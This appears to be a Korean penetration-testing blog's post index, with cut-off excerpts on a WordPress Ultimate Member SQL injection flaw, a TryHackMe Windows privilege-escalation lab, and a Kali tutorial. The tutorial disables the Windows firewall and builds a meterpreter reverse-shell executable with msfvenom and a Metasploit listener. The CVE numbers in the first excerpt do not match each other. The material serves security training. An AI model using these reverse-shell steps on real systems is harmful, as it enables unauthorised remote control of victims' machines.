모의침투 3

[CVE-2024-1017] [POC] Wordpress SQL 인젝션 취약점

CVE-2024-1070 세부정보취약점 종류 : SQL INJECTION Ultimate Member 플러그인 SQL INJECTION 취약점Ultimate Member 플러그인은 사용자 프로필, 등록, 로그인, 회원 디렉토리, 콘텐츠 제한 및 회원 자격을 관리하는 WordPress 플러그인입니다. 하지만 버전 2.1.3부터 2.8.2까지의 이 플러그인은 사용자가 제공한 입력을 제대로 검증하지 않아서 SQL 인젝션 공격에 취약합니다.https://nvd.nist.gov/vuln/detail/CVE-2024-1071 NVD - CVE-2024-1071CVE-2024-1071 Detail Awaiting Analysis This vulnerability is currently awaiting analysis..

취약점 | CVE 2024.10.01

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

TASK 1 Deploy the Vulnerable Windows VM설명현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다 RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다 xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]위와같이 들어가시면 됩니다 TASK 2  Generate a Reverse Shell Executable설명  오케이 좋습니다 이제 msfvenom 모듈을..

TryHackMe | CTF 2024.09.08

KALI LINUX | 윈도우 10 모의해킹 Reverse_tcp

Metasploit & msfvenom 활용해 윈도우 10 모의침투.윈도우 10 방화벽 설정 설정관리 메뉴 클릭 이와 똑같이 다 끄기 Msfvenom 설정아래와 같이 작성 msfvenom -p windows/meterpreter/reverse_tcp LHOST=자신의 IP LPORT=4444 -f exe > 파일이름.exe  이런식으로 뜨면 성공 !  msfvenom 으로 만든 악성파일이 보임. Metasploit 설정 메타스플로잇 실행 모듈 설정 msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp  msf6 exploit(multi/handler) > set payload /windows/meter..